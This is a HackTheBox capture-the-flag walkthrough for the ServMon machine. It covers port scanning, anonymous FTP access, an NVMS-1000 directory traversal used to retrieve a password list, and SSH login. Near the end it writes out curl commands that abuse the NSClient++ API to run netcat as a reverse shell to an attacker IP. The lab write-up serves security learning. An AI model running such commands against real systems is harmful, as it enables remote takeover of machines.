ServMon HacktheBox Walkthrough
In this article we are going to solve another boot2root challenge Servmon from hackthebox .
walkthrough
IP of the target 10.10.10.184
we started with nmap to find open ports and services running in the system by using the command
nmap -sC -sV -o nmap.txt 10.10.10.184
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
as we can see that so many ports are open , so first of all we decided to login anonymously into FTP using credentials anonymous anonymous

now here we found two Users "Nadine" and "Nathan" , and after enumerating more we found two important text files , we downloaded them in our local system , now lets try to read them.

Information extracted :-
[+] user names : Nathan and Nadine
[+] passwords.txt file stored in Desktop directory
[+] NVMS web application is present
now our next step is to enumerate port 80 .

we have a NVMS-1000 login panel and some common username and password didn't worked , so we started to search for nvms-1000 exploit and found one using the command
search nvms

with the Description as "Directory Traversal" we got one thing clear that we have password.txt and usernames and a Desktop directory so there are chances that we can extract the passwords.txt file using this exploit , okay lets try

okay we have got something , lets try to read the file using cat command

umm looks interesting we have got a list of passwords and we have two users also as "Nadine" and "Nathan" , and SSH Port is also open , so we can try these passwords against two users to check if we are on right path or not.

okay we have found the password for user nadine as "********" , now I tried this password to connect to the system as user nadine using ssh
ssh nadine@10.10.10.184

we are in now as user nadine and can read the user flag and it's time for privilege
escalation :)
we started searching in different directories and found something useful

lets try to read the file using type command ;)

it means only 127.0.0.1 is allowed to use nsclient++ and not any other IP , so after this we have two methods to get admin access , one is using the Port forwarding and then following the NSClient++ exploit and another one is to use the nsclient++ api(easy way) and of-course we preferred the easy way :)
first of all we will transfer nc.exe to /tmp directory .

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/new.bat --data-binary "c:\temp\nc.exe 10.10.14.22 1234 -e cmd.exe"
curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/new/commands/execute?time=1m
after executing these commands we get the reverse shell as admin

we can read the final flag now and this completed our challenge , Hope you like the walkthrough :)